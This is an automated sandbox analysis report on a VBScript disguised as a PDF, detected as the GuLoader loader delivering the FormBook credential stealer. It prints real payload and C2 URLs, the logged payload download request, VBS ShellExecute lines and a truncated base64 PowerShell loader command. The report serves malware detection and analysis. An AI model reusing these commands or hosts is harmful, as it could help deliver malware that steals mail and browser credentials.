Windows Analysis Report
Wire-84844663637346665.PDF.vbs

Overview

General Information

Sample Name: Wire-84844663637346665.PDF.vbs
Analysis ID: 557834
MD5: 2eb1625e8d4e3f9b19ab947d188d0be8
SHA1: 7aad4e8d8f521d1c36a7468418047c8a5751b7e9
SHA256: 354529cf4cd5498c64a0c69c6dd9eb8962250542eea7f89a76faf64f5086da35
Tags: GuLoadervbs
Infos:

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Potential evasive VBS script found (sleep loop)
Maps a DLL or memory area into another process
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses an obfuscated file name to hide its real file extension (double extension)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000018.00000000.651802861.0000000002C00000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://research.the-miyanichi.co.jp/wp-^"}
Source: 00000018.00000002.777224574.00000000028A0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.recountsol.xyz/ty13/"], "decoy": ["renatocarrion.com", "inadmaa.email", "dgsgamer.com", "scentsofhome.com", "vimeghbrandshop.online", "seaxneat.com", "10448se147thave.com", "msewy.xyz", "greekgolden.com", "thinktosolve.com", "darmadao.com", "patriotproperties.info", "erwsed.tech", "iamanocelot.com", "marketinginspiration4.biz", "googleprog.com", "nz34.com", "xu6cotckdwbd.xyz", "jimmychenchen.com", "kntfashionstore.online", "ogusourcing.com", "digitalgraz.com", "nomiehalth.com", "neatoboutique.com", "luziaeeveraldo.com", "kootenaysewersolutions.com", "powerplantsliverpool.com", "allinclusiveplaya.com", "jldphotograph.com", "threedaydeli.com", "sv7wgmna.xyz", "reformasmod.com", "autoconnect.support", "hustle1radio.com", "thepremiersales.com", "transform.guide", "awolin.link", "sala1.xyz", "xn--er-7ka.com", "leadthisway.com", "bluegrownmx.com", "tablewaro.com", "ecoprimex.com", "gloress.com", "khodabavar.com", "verhuisdoos.net", "accessftlauderdale.com", "gorgeousincome.com", "jxs6652.com", "bioheallabs.com", "pdswakl.com", "douglasacessorios.com", "coincapmjd.xyz", "liningning.xyz", "buyoutz.site", "agvtime.com", "homeit99.com", "caveatcooperative.com", "honeyboxsoap.com", "snoringdisorders.com", "dianziyanpeijian.com", "pcc.life", "lookbypc.com", "osldjz.com"]}
Multi AV Scanner detection for submitted file
Source: Wire-84844663637346665.PDF.vbs ReversingLabs: Detection: 11%
Yara detected FormBook
Source: Yara match File source: 00000019.00000000.733105957.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.750582708.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.777224574.00000000028A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.781396856.000000001E7B0000.00000040.00020000.sdmp, type: MEMORY
Source: unknown HTTPS traffic detected: 133.242.141.149:443 -> 192.168.2.6:49841 version: TLS 1.2
Source: Binary string: ieinstal.pdbGCTL source: explorer.exe, 00000021.00000000.897631376.000000000834F000.00000004.00020000.sdmp
Source: Binary string: ieinstal.pdb source: explorer.exe, 00000021.00000000.897631376.000000000834F000.00000004.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000018.00000002.782255727.000000001EAF0000.00000040.00000001.sdmp, ieinstal.exe, 00000018.00000002.782669035.000000001EC0F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000018.00000002.782255727.000000001EAF0000.00000040.00000001.sdmp, ieinstal.exe, 00000018.00000002.782669035.000000001EC0F000.00000040.00000001.sdmp
Source: Binary string: help.pdbGCTL source: ieinstal.exe, 00000018.00000002.778101079.000000000309C000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.777312108.00000000028D0000.00000040.00020000.sdmp
Source: Binary string: help.pdb source: ieinstal.exe, 00000018.00000002.778101079.000000000309C000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.777312108.00000000028D0000.00000040.00020000.sdmp

Networking
barindex
Potential malicious VBS script found (has network functionality)
Source: Initial file: BinaryStream.SaveToFile Svageli, 2
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.recountsol.xyz/ty13/
Source: Malware configuration extractor URLs: https://research.the-miyanichi.co.jp/wp-^
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SAKURA-ASAKURAInternetIncJP SAKURA-ASAKURAInternetIncJP
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/bin_GuOImF134.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: research.the-miyanichi.co.jpCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: smartscreen.exe, 00000025.00000002.887372203.0000026134F28000.00000004.00000020.sdmp String found in binary or memory: http://canonicalizer.ucsuri.tcs/680074007400700073003a002f002f00700069006e0067002e002e006e0061007600
Source: powershell.exe, 00000011.00000002.715234826.000000000077C000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000003.695279329.000000000309C000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.778101079.000000000309C000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000003.694948710.000000000309C000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000003.695511033.000000000309C000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000011.00000002.722919182.00000000059FE000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: smartscreen.exe, 00000025.00000002.887372203.0000026134F28000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000011.00000002.718935785.0000000004AE7000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000011.00000002.718141346.00000000049A1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000011.00000002.718935785.0000000004AE7000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000019.00000000.715778116.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000019.00000000.698139484.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000019.00000000.738782106.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000011.00000002.722919182.00000000059FE000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.722919182.00000000059FE000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.722919182.00000000059FE000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000011.00000002.718935785.0000000004AE7000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000011.00000002.722919182.00000000059FE000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp String found in binary or memory: https://research.the-miyanichi.co.jp/
Source: ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp String found in binary or memory: https://research.the-miyanichi.co.jp/P
Source: ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp String found in binary or memory: https://research.the-miyanichi.co.jp/wp-content/uploads/bin_GuOImF134.bin
Source: ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp String found in binary or memory: https://research.the-miyanichi.co.jp/wp-content/uploads/bin_GuOImF134.bin5
Source: ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp String found in binary or memory: https://research.the-miyanichi.co.jp/wp-content/uploads/bin_GuOImF134.binT
Source: unknown DNS traffic detected: queries for: research.the-miyanichi.co.jp
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/bin_GuOImF134.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: research.the-miyanichi.co.jpCache-Control: no-cache
Source: unknown HTTPS traffic detected: 133.242.141.149:443 -> 192.168.2.6:49841 version: TLS 1.2

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 00000019.00000000.733105957.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.750582708.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.777224574.00000000028A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.781396856.000000001E7B0000.00000040.00020000.sdmp, type: MEMORY

System Summary
barindex
Detected FormBook malware
Source: C:\Windows\SysWOW64\help.exe Dropped file: C:\Users\user\AppData\Roaming\N6AQ8R9T\N6Alogri.ini Jump to dropped file
Source: C:\Windows\SysWOW64\help.exe Dropped file: C:\Users\user\AppData\Roaming\N6AQ8R9T\N6Alogrv.ini Jump to dropped file
Malicious sample detected (through community Yara rule)
Source: 00000019.00000000.733105957.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000000.733105957.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000000.750582708.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000000.750582708.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.777224574.00000000028A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.777224574.00000000028A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.781396856.000000001E7B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.781396856.000000001E7B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBCAGEAYwBvAG4AZwAgAFMAbABlAHQAbgAgAEYARQBKAEwAUABMAEEAIABWAGkAbgBkAGYAbAA0ACAAZgBhAHIAYQAgAGEAcgB0AGUAcgAgAE8AdgBlAHIAYQByAG8AIABDAEkATgBFAE4ARQBHACAARABkAHMAbwBmAHIAZQByADEAIABCAFIASQBUAFQATABFAFAAQQAgAFMAZQBtAGkAYwBvAHIAbwBuACAAQgB1AG4AZABkAHkAcgBlADEAIABVAE4ATQBBAE4AQQBHACAAUgBJAEMATwBDAEgARQBUACAAaABlAG4AcgBlAGcAbgAgAEkAbgBkAGQAZQBsAGkAbgBnAGUAMQAgAFIATwBUAEEAVABJACAATwB2AGUAcgBmAG8AZAByAGUAcwAxACAAUQBVAEkARQBUACAAYQByAGEAYgBhAG4AIABJAE4ARABEACAAdQBiAGUAdABpAG0AZQAgAGEAawB0AGkAdgBpAHMAdAAgAHAAZQByAHQAdQByAGIAZgAgAEoAQQBHAEUAUgBFAE4AIABLAEkATABPAE0ARQBHAEEAIABBAGMAaABvAG4AZAByACAAQgBuAG4AZQAgAEMAbwBuAGcAcgBlAGcAMwAgAEIAUgBBAE4ARABFAE4AIABJAG4AZwBlAG4AaQByAHQAMgAgAFIAZQB2AG8AIABTAGMAaQByACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABIAGEAbgBkAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAEgAYQBuAGQAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAE8ATgBNAEEATABJAEcALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAsAHIAZQBmACAASQBuAHQAMwAyACAASABhAG4AZABsACwAaQBuAHQAIABCAG8AcgBkAHMAawA2ACwAaQBuAHQAIABIAGEAbgBkAGwANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABEAEEAVQBHAEgAVABFAFIALAB1AGkAbgB0ACAAVABhAG4AegBhAG4AaQA1ACwAaQBuAHQAIABoAGEAYQBuACwAaQBuAHQAIABIAGEAbgBkAGwAMAAsAGkAbgB0ACAARgBhAGwAbABhAGMAaQBlAHMANQAsAGkAbgB0ACAAQgBHAEUAUgAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAwACwAdQBpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAxACwASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAAbQBlAHQAYQB0AGUAZwBuADMALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4ANQAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADYALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA3ACwAaQBuAHQAIABtAGUAdABhAHQAZQBnAG4AOAAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAVgBlAGoAcgBmAG8AOQAgAGMAbABvAGMAawByAGEAIABMAEkATQBCACAATwB2AGUAcgBtADYAIABIAHkAcABlAHIAIABEAGkAcwBkAGEAaQBuACAAbgBvAG4AYwBvAG4AIAB0AG8AbABkAGEAdAB0AGUAcwAgAFMAdQBsAGMAYQAgAE8AcAByAGUAdABoAG8AbAAgAGgAbwBsAG8AY
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBCAGEAYwBvAG4AZwAgAFMAbABlAHQAbgAgAEYARQBKAEwAUABMAEEAIABWAGkAbgBkAGYAbAA0ACAAZgBhAHIAYQAgAGEAcgB0AGUAcgAgAE8AdgBlAHIAYQByAG8AIABDAEkATgBFAE4ARQBHACAARABkAHMAbwBmAHIAZQByADEAIABCAFIASQBUAFQATABFAFAAQQAgAFMAZQBtAGkAYwBvAHIAbwBuACAAQgB1AG4AZABkAHkAcgBlADEAIABVAE4ATQBBAE4AQQBHACAAUgBJAEMATwBDAEgARQBUACAAaABlAG4AcgBlAGcAbgAgAEkAbgBkAGQAZQBsAGkAbgBnAGUAMQAgAFIATwBUAEEAVABJACAATwB2AGUAcgBmAG8AZAByAGUAcwAxACAAUQBVAEkARQBUACAAYQByAGEAYgBhAG4AIABJAE4ARABEACAAdQBiAGUAdABpAG0AZQAgAGEAawB0AGkAdgBpAHMAdAAgAHAAZQByAHQAdQByAGIAZgAgAEoAQQBHAEUAUgBFAE4AIABLAEkATABPAE0ARQBHAEEAIABBAGMAaABvAG4AZAByACAAQgBuAG4AZQAgAEMAbwBuAGcAcgBlAGcAMwAgAEIAUgBBAE4ARABFAE4AIABJAG4AZwBlAG4AaQByAHQAMgAgAFIAZQB2AG8AIABTAGMAaQByACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABIAGEAbgBkAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAEgAYQBuAGQAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAE8ATgBNAEEATABJAEcALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAsAHIAZQBmACAASQBuAHQAMwAyACAASABhAG4AZABsACwAaQBuAHQAIABCAG8AcgBkAHMAawA2ACwAaQBuAHQAIABIAGEAbgBkAGwANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABEAEEAVQBHAEgAVABFAFIALAB1AGkAbgB0ACAAVABhAG4AegBhAG4AaQA1ACwAaQBuAHQAIABoAGEAYQBuACwAaQBuAHQAIABIAGEAbgBkAGwAMAAsAGkAbgB0ACAARgBhAGwAbABhAGMAaQBlAHMANQAsAGkAbgB0ACAAQgBHAEUAUgAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAwACwAdQBpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAxACwASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAAbQBlAHQAYQB0AGUAZwBuADMALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4ANQAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADYALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA3ACwAaQBuAHQAIABtAGUAdABhAHQAZQBnAG4AOAAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAVgBlAGoAcgBmAG8AOQAgAGMAbABvAGMAawByAGEAIABMAEkATQBCACAATwB2AGUAcgBtADYAIABIAHkAcABlAHIAIABEAGkAcwBkAGEAaQBuACAAbgBvAG4AYwBvAG4AIAB0AG8AbABkAGEAdAB0AGUAcwAgAFMAdQBsAGMAYQAgAE8AcAByAGUAdABoAG8AbAAgAGgAbwBsAG8AY Jump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: obj1.ShellExecute MyFile , " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
Source: Initial file: obj1.ShellExecute "powershell.exe", " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7121
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7121 Jump to behavior
Yara signature match
Source: 00000019.00000000.733105957.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000000.733105957.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000000.750582708.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000000.750582708.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.777224574.00000000028A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.777224574.00000000028A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.781396856.000000001E7B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.781396856.000000001E7B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_07897E00 17_2_07897E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_07897E00 17_2_07897E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_07CF3130 17_2_07CF3130
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_07CF0040 17_2_07CF0040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE22AE 24_2_1EBE22AE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE2EF7 24_2_1EBE2EF7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB36E30 24_2_1EB36E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB4EBB0 24_2_1EB4EBB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE1FF1 24_2_1EBE1FF1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB420A0 24_2_1EB420A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE20A8 24_2_1EBE20A8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB2B090 24_2_1EB2B090
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB2841F 24_2_1EB2841F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBD1002 24_2_1EBD1002
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB42581 24_2_1EB42581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB2D5E0 24_2_1EB2D5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB10D20 24_2_1EB10D20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB34120 24_2_1EB34120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB1F900 24_2_1EB1F900
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE2D07 24_2_1EBE2D07
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE1D55 24_2_1EBE1D55
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 1EB1B150 appears 35 times
Contains functionality to call native functions
